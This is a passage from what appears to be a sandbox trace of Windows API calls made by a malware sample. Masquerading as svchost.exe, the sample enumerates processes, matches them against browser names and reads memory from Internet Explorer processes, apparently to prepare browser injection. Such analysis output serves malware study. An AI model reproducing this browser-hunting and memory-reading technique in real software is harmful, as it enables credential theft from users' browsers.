	[0195.568] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0195.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.568] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.569] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0195.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.569] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0195.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xf84
	[0195.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.571] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0195.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.571] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.572] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0195.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.572] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.572] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0195.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xf88
	[0195.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.573] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0195.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.574] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0195.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.574] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0195.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.574] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.574] NtQueryInformationProcess (in: ProcessHandle=0xf88, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0195.574] ReadProcessMemory (in: hProcess=0xf88, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0195.574] ReadProcessMemory (in: hProcess=0xf88, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0195.574] ReadProcessMemory (in: hProcess=0xf88, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0195.575] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0195.575] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0195.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xf8c
	[0195.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.575] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0195.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.576] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0195.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.576] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0195.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.576] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.576] NtQueryInformationProcess (in: ProcessHandle=0xf8c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0195.577] ReadProcessMemory (in: hProcess=0xf8c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0195.577] ReadProcessMemory (in: hProcess=0xf8c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0195.577] ReadProcessMemory (in: hProcess=0xf8c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0195.577] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0195.577] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0195.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xf90
	[0195.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.610] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0195.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.611] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.611] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0195.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.611] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.611] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0195.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xf94
	[0195.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.612] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0195.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.613] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.613] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0195.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.613] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.613] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.614] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xf98
	[0195.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.614] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.615] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.615] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.615] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.615] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.616] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0195.617] CloseHandle (hObject=0x188) returned 1
	[0195.617] Sleep (dwMilliseconds=0x64) 
	[0195.733] GetCurrentProcessId () returned 0x110
	[0195.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0195.736] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0195.736] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0195.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0195.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xf9c
	[0195.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.738] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.738] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.738] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.738] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.739] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0195.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xfa0
	[0195.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.740] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.740] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.740] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.741] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.741] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0195.741] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xfa4
	[0195.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.742] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0195.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.742] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.742] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0195.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.743] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.743] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0195.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xfa8
	[0195.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.744] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0195.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.744] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.744] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0195.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.745] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0195.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xfac
	[0195.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.746] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0195.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.746] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.747] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0195.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.747] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.747] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0195.748] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xfb0
	[0195.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.748] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0195.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.749] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.749] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0195.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.749] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.750] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0195.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xfb4
	[0195.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.750] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0195.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.751] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.751] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0195.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.751] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.751] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0195.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xfb8
	[0195.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.752] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0195.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.752] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.753] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0195.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.753] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.753] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xfbc
	[0195.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.754] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.754] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.754] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.755] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.755] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xfc0
	[0195.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.756] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.756] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.756] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.757] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.757] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xfc4
	[0195.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.758] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.758] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.758] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.758] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.759] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xfc8
	[0195.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.759] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.760] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.760] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.760] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.761] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xfcc
	[0195.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.761] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.762] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.762] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.762] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.762] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xfd0
	[0195.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.763] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.764] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.764] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.764] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0195.764] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0195.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xfd4
	[0195.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.778] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0195.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.778] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0195.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0195.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0195.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
